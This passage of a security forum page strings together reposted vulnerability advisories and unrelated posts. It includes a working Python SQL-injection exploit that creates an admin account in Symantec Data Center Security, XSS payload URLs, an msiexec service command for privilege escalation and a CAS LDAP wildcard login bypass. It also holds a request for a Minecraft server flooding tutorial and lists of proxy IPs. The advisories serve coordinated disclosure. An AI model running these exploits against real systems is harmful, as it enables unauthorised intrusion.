Management Instrumentation (.mof files) The restrictions imposed by default policies can be bypassed partially by exploiting incorrect assumptions made in the policy regarding the Windows Management Instrumentation. The policy does not take intended OS functionality to execute code into account. Proof of concept: ----------------- 1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289) The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is vulnerable to SQL injection. By sending a specially crafted HTTP request, arbitrary SQL statements can be executed. In a proof of concept exploit, SQL statements to add a new SDCS:SA user with admin privileges (username: secconsult, password: PASSWORD123!) were executed. These statements are: INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); The code used to exploit the SQL injection vulnerability is listed below: import httplib def send_request(host,data): params = data headers = {"AppFire-Format-Version": "1.0", "AppFire-Charset": "UTF-16LE", "Content-Type":"application/x-appfire", "User-Agent":"Java/1.7.0_45", } conn = httplib.HTTPSConnection(host) conn.request("POST", "/sis-ui/authenticate", params, headers) response = conn.getresponse() data=response.read() conn.close() return response,data header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n" data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table #data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n" data = data.encode('utf-16le') eof_flag="\nEOF_FLAG\n" header = header %(len(data)) payload=header+data+eof_flag response,data = send_request("<host>:4443",payload) print data.decode('utf-16le') print response.status As the application users act as Tomcat administrators, an attacker can login into the Tomcat manager as well. The Tomcat manager is available by default via TCP port 8081 HTTPS. The Tomcat Web Application Manager can be used to deploy new .war-files containing attacker-controlled Java code. This allows an attacker to execute arbitrary commands on the operating system with the permissions/user of the "Symantec Data Center Security Server Manager" service (SISManager) which are SYSTEM. 2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224) At least the following URLs are vulnerable to XSS: https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script> https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script> 3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225) The following URLs discloses internal information: https://example.com:8081/webui/admin/environment.jsp 4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client) (CVE-2014-9226) - Persistent code execution via Windows Services Windows Service binaries can have file extensions other than ".exe". This allows an attacker to execute arbitrary files and enables automatic execution of malicious code at OS boot. - Remote code execution via RPC Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can be modified to write files not ending with ".exe" on the target system. - Policy bypass: Extraction of Windows passwords/hashes The tool "mimikatz" can be used to extract Windows credentials. - Privilege elevation via Windows Installer (msiexec.exe) msiexec.exe is trusted "safe privileges" when started as a service (usually "Windows Installer" parameter "/V"). This can be abused by creating a service that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid .msi file. Upon service start the .msi file is executed with "safe privileges" privileges and not subject to any SDCS:SA Client checks. sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore net start evil_service - Privilege elevation/code execution via Windows Management Instrumentation (.mof files) On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\" are automatically compiled/executed. These trigger arbitrary code execution. The code is executed with "def_winsvcs_ps" permissions. Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in Symantec Data Center Security: Server Advanced version 6.0, which was the most recent version at the time of discovery. However other versions (SCSP 5.2.9) are affected by the vulnerabilities as well. See the vendor information in the Solution section. Vendor contact timeline: ------------------------ 2014-10-20: Sending advisory and proof of concept exploit via encrypted channel. 2014-10-20: Vendor acknowledges receipt of advisory. 2014-11-18: Requesting status update. 2014-11-18: Vendor responds and informs about an advisory in December, version containing fixes in February. 2014-12-04: Vendor informs about delays in releasing fixes/mitigations, target release date mid-January. 2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17). 2015-01-17: Vendor releases fixes for SCSP. 2015-01-19: Vendor releases advisory and mitigations for SCSP/ 2015-01-22: SEC Consult releases coordinated security advisory. Solution: --------- Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1). Not all vulnerabilities are fixed by this update! However, Symantec has provided mitigations for these issues: More information can be found at: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00 http://www.symantec.com/business/support/index?page=content&id=TECH227679 http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071 Workaround: ----------- See solution. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF Stefan Viehböck / @2015 Source
  15. Oracle’s first Critical Patch Update of the year arrived Tuesday with its usual volume, and some disturbing fanfare. Oracle admins today are staring at 169 patches on their collective plates across the company’s product line. One of the more pressing fixes is for a an issue in the Oracle E-Business Suite, a bundle of applications that includes CRM, financial, supply chain and project management software. Noted Oracle bug-hunter David Litchfield last June 11 alerted Oracle to a serious flaw that he said behaved like a backdoor, though he told Threatpost he did not believe it was an intentional backdoor such as one implanted by law enforcement or government. “Maybe, though, giving them the benefit [of the] doubt, it could be that some [developer] was testing something and they forgot to turn it off. Who knows? What is concerning however is that Oracle seem not to know who and why this privilege was granted, either,” Litchfield said via email. Litchfield released some details on the vulnerability, CVE-2015-0393, yesterday, explaining that the PUBLIC role in the database is granted INDEX privileges on the SYS table. This allows anyone to create an index in this particular table, Litchfield said. “By creating a function-based index an attacker can execute arbitrary SQL as the SYS user thus fully compromising the database server,” Litchfield said. “Anyone with a vulnerable eBusiness suite web server connected to the internet is potentially exposed to this as it is possible to chain multiple vulnerabilities to exploit this without a username and password.” Litchfield said there is no reason for PUBLIC to have INDEX privileges on the DUAL table, leading him to speculate that it’s either an intentional backdoor, or a result of poor coding. “My first thought was that this had possibly been left as a backdoor (because it can be trivially exploited to gain SYSDBA privileges) and was an indication that the database server had been compromised,” said Litchfield, who discovered the issue during a client engagement. “I communicated my fears to the client and they began an investigation to determine when the privilege had been granted and by who to ascertain the why. It turns out that no one had—this privilege is granted as part of a seeded install of Oracle eBusiness suite.” Litchfield confirmed that Oracle told him that its engineers looked at the bug and said there was “no indication of when or why the grants were originally added.” Oracle said in its CPU advisory that the vulnerability is not remotely exploitable and merited a criticality rating of 6.0 out of 10. “This has been addressed.” -Oracle spokesperson When asked for a comment, an Oracle representative sent Threatpost a link to the January Critical Patch Update and said: “This has been addressed,” referring to the Litchfield vulnerability. Oracle also announced that it was disabling the use of SSL 3.0, calling it an “obsolete protocol” that was only aggravated by the POODLE fallback vulnerability. Attacks against POODLE allow an attacker to take advantage of the fact that when a secure connection attempt fails, under some circumstances the Web server will fall back to an older protocol and try to renegotiate the secure connection. If the server supports SSLv3, an old protocol, and the attacker can force the failed connection attempt, the attacker can then execute a padding oracle attack against the server and eventually decrypt the contents of the secure connection. The company went a step further to recommend disabling SSL altogether in favor of TLS 1.2. “They should also expect that all versions of SSL be disabled in all Oracle software moving forward. A manual configuration change can allow Java SE clients and server endpoints, which have been updated with this Critical Patch Update, to continue to temporarily use SSL v3.0,” said Eric Maurice, Oracle software security assurance director. “However, Oracle strongly recommends organizations to phase out their use of SSL v3.0 as soon as possible.” As for Java, Oracle patched 19 vulnerabilities in the platform, 14 of those remotely exploitable, including a half-dozen rating either 9.3 or 10, the highest score on Oracle’s risk matrix. Four client-side vulnerabilities rated a 10, however, Oracle said the number of overall Java bugs continues to decline. In its last CPU, for example, Oracle patched 25 Java flaws, and last April it patched 37. “This relatively low historical number for Oracle Java SE fixes reflect the results of Oracle’s strategy for addressing security bugs affecting Java clients and improving security development practices in the Java development organization,” Maurice said. Oracle, meanwhile patched eight vulnerabilities in its flagship Oracle Database Server, none of them remotely exploitable, and none applicable to client-only installations. The only other highly critical bugs, scoring 10.0, were found in Oracle Sun Systems Fujitsu M10-1, M10-4 and M10-4S servers. Source
  16. =====[Alligator Security Team - Security Advisory]======== CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP authentication via crafted wildcards. Reporter: José Tozo < juniorbsd () gmail com > =====[Table of Contents]================================== 1. Background 2. Detailed description 3. Other contexts & solutions 4. Timeline 5. References =====[1. Background]====================================== CAS is an authentication system originally created by Yale University to provide a trusted way for an application to authenticate a user. =====[2. Detailed description]============================ A valid username and password required. Given a username johndoe and a password superpass, you can sucessfully achieve login using wildcards: username: jo* password: superpass The login will be sucessfully only if the ldap bind search return one unique member. The vulnerability described in this document can be validated using the following example: Client Request: root@machine:/# curl -k -L -d "username=jo%2A&password=superpass" https://login.cas-server.com/v1/tickets (note that * was url encoded to %2A) <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>201 The request has been fulfilled and resulted in a new resource being created</title> </head> <body> <h1>TGT Created</h1> <form action=" https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz" method="POST">Service:<input type="text" name="service" value=""><br><input type="submit" value="Submit"></form> </body> </html> Server log: ============================================================= WHO: [username: jo*] WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz ACTION: TICKET_GRANTING_TICKET_CREATED APPLICATION: CAS WHEN: Tue Jan 20 18:38:17 BRST 2015 CLIENT IP ADDRESS: xxx.xxx.xxx.xxx SERVER IP ADDRESS: xxx.xxx.xxx.xxx ============================================================= =====[3. Other contexts & solutions]====================== In order to apply the patch, you have to update at least to version 3.5.3. Newer versions, such as CAS 4.0.0 and above, are not vulnerable. =====[4. Timeline]======================================== 29/12/14 Vendor notification. 14/01/15 Vendor rolled out new version 3.5.3 17/01/15 Mitre assigned CVE-2015-1169. 21/01/15 Disclosure date. =====[5. References]======================================= 1 - https://github.com/Jasig/cas/pull/411 2 - https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c -- Grato, Tozo Source
  17. CapTipper: Omri Herscovici: CapTipper - Malicious HTTP traffic explorer tool CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found. The tool provides the security researcher with easy access to the files and the understanding of the network flow, and is useful when trying to research exploits, pre-conditions, versions, obfuscations, plugins and shellcodes. Feeding CapTipper with a drive-by traffic capture (e.g of an exploit kit) displays the user with the requests URI's that were sent and responses meta-data. The user can at this point browse to Romanian Security Team - Homepage[uRI] and receive the response back to the browser. In addition, an interactive shell is launched for deeper investigation using various commands such as: hosts, hexdump, info, ungzip, body, client, dump and more... Download: https://github.com/omriher/CapTipper
  18. Tor-ramdisk is a uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. For those not familiar with Tor, it is a system which allows the user to construct encrypted virtual tunnels which are randomly relayed between Tor servers (nodes) until the connection finally exits to its destination on the internet. The encryption and random relaying resist traffic analysis in that a malicious sniffer cannot easily discover where the traffic is coming from or what data it contains. While not perfect in its efforts to provide users with anonymity, Tor does help protect against unscrupulous companies, individuals or agencies from "watching us". For more information, see the Tor official site. The usefulness of a RAM only environment for Tor became apparent to me when Janssen was arrested by the German police towards the end of July, 2007. (You can read the full story in a CNET article.) While the police did not seize the computer for whatever reasons, they certainly could have. More typically, it would have been taken for forensic analysis of the data on the drives. Of course, if the computer housing the Tor server has no drives, there can be no question that it is purely a network relaying device and that one should look elsewhere for the "goods". Other advantages became clear: It is useful to operators that want all traces of the server to disappear on powerdown. This includes the private SSL keys which can be housed externally. The environment can be hardened in a manner specific to the limited needs of Tor. It has the usual speed advantages of diskless systems and can run on older hardware. The only known disadvantage is that it cannot host Tor hidden services which would require other services (e.g. http), and their resources (e.g. hard drive space), in addition to the Tor server itself. However, as a middle or exit node, it is ideal. Download Read more: Tor-ramdisk | opensource.dyc.edu
  19. Daca stiti si voi cum sa dau flood la un server de minecraft nu prea po****t , atunci plz un tutorial video sau scris plz !
  20. Da... este gratis poti sa alegi ori icecast ori shoutcast, faza e ca sunt max 50 ascultatori si 100 mb autodj, dar e foarte bine si asa. Web radio Grátis - Streaming de radio online Serios acum am nevoie de un cont steam hai baieti, donati. again .
  21. hello guys Once Again ===> HIdeMyAss Premium proxies 19/11/2013 46.47.98.192:1080 109.207.61.158:8090 109.207.61.163:8090 109.207.61.152:8090 194.141.96.251:8080 62.253.249.2:8080 23.81.65.178:1080 89.200.252.149:3128 109.207.61.156:8090 109.207.61.189:8090 109.207.61.218:8090 91.203.140.46:3128 94.198.34.230:80 62.253.249.150:8080 109.207.61.62:8090 217.12.62.194:8080 109.207.61.178:8090 212.116.131.205:8080 95.110.225.65:3128 109.207.61.208:8090 46.165.193.67:9183 77.120.126.35:3128 178.207.11.98:1080 97.95.225.218:31813 78.130.201.110:8080 94.154.26.24:8090 193.68.120.65:8080 94.154.31.16:8090 98.225.11.221:31540 68.185.185.203:54875 213.108.174.191:80 94.154.31.22:8090 94.154.31.20:8090 76.25.29.199:18088 86.127.173.1:8123 Full List: HideMyass Premium Proxies List 19 Nov 2013ProxyGratuit-Proxy Server/free proxy sites/Online Proxy/Proxy Website Enjoy
  22. hello HideMyAss Premium Proxies 11/11/2013 146.185.62.50:8080 199.30.136.117:7808 198.24.181.73:8089 69.197.132.80:8089 137.88.169.25:8080 66.35.68.146:7808 173.213.113.111:8089 205.202.37.39:8090 173.213.96.229:3127 69.197.132.80:7808 66.35.68.145:3127 173.213.96.229:8089 198.204.245.212:8089 198.204.245.212:7808 54.200.176.207:80 Full List==> HideMyAss Premium Proxies 11 Nov 2013ProxyGratuit-Proxy Server/free proxy sites/Online Proxy/Proxy Website Enjoy
  23. Salutare din nou, Am la birou un "server" Linux (CentOS) care are asa: 2 placi gigabit onboard si alte 2 separata pe PCI sau PCIe. Se fac destule transferuri pe zi si am decis sa schimbam cele 2 placi de retea separata cu alte 2 tot gigabit dar profi (gasisem de la Intel la 160 lei/buc). Acuma sunt tot gigabit dar ceva la 30 de lei .... Daca inlocuiesc cele 2 placi de retea, mai trebuie sa fac ceva modificari in server la networking sau le vede si atat ? Ramane tot ifconfig-ul, eth-uri tot ? PS: am pus server intre " " deoarece este un desktop facut server. Multumesc.
  24. http://www.youtube.com/watch?v=zccI-O3dm38
  25. Am dat si eu drumul azi la Powered by TravianX - s4gamers.com pentru pasionatii de TRAVIAN... enjoy
×
×
  • Create New...